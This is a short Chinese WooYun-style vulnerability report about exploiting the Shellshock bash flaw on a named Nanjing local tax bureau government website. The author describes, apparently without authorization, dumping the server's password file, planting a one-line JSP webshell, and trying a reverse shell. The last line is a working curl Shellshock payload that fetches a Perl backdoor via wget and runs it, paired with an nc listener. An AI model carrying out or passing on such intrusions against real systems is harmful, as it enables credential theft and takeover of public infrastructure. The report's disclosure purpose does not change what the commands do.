WooYun.org

偶然的机会看到了南京地税的网站，
http://www.njds.gov.cn/cgi-bin/test-cgi
发现存在bash漏洞；如下：

就鲁一把；远程测试下是否真的存在；，我塞，用户密码文件直接掳出来了；

继续看；直接把路径也搞出来了；

剩下就是直接反弹后门了；
好，有了路径，那就写一句木马吧；试下；如下图所示，首先写入一句话jsp木马；然后查看是否成功写入文件；发现成功写入；

下面就是用菜刀的机会了；郁闷了，菜刀就是无法反弹和列目录；怀疑是目录问题，可以重试几次应该就OK了，但还是怕警察叔叔查水表，我去洗洗睡了；这个洞就到这吧，就不拿主机权限了；原想拿到主机权限，然后进行提权；
另外一个思路，直接反弹shell;
本身已在个人电脑上，开启了监听；
nc -lvp 2344;
然后执行如下反弹命令，未成功，想想还是提个洞吧，不深入挖了，
curl -A '() { :; }; cd /tmp;wget http://x.x.x.x/back.pl;chmod +x back.pl; ./tmp/back.pl x.x.x.x 2344;' http://www.njds.gov.cn/cgi-bin/test-cgi